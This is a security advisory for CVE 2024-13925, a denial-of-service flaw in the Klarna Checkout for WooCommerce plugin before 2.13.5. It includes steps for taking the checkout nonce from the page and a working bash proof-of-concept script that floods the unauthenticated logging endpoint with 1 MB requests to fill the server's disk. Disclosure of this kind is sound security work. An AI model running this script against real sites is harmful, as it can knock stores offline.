Klarna Checkout for WooCommerce < 2.13.5 – DoS via Excessive Logging | CVE 2024-13925

Description

The plugin exposes an unauthenticated WooCommerce Ajax endpoint that allows an attacker to flood the log files with data at the maximum size allowed for a POST parameter per request. This can result in rapid consumption of disk space, potentially filling the entire disk.

Proof of Concept

1. Add any item to the cart on the target website.
2. Proceed to the checkout page.
3. Select Klarna as the payment method.
4. Inspect the page source and locate the JavaScript variable `kco_params.log_to_file_nonce`.
5. Copy the value of the nonce

Run this bash script (`bash poc.sh https://site-to-attack.com 4e4f983090 10`):

```
#!/bin/bash

URL="$1"
NONCE="$2"
COUNT="${3:-10}"  # Default 10 requests

if [ -z "$URL" ] || [ -z "$NONCE" ]; then
    echo "Usage: $0 <url> <nonce> [count]"
    exit 1
fi

# Create a large payload using a file to avoid argument length limits
PAYLOAD_FILE="/tmp/payload.txt"
dd if=/dev/zero bs=1M count=1 2>/dev/null | tr '\0' 'A' > "$PAYLOAD_FILE"

for i in $(seq 1 $COUNT); do
    curl -s "$URL/?wc-ajax=kco_wc_log_js" \
        -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
        --data-urlencode "message@$PAYLOAD_FILE" \
        --data-urlencode "nonce=$NONCE"
    echo "Request $i sent"
    sleep 0.1
done

rm "$PAYLOAD_FILE"
```

See that the log files increase in size. Running this repeatedly could cause a DoS by filling up the disk.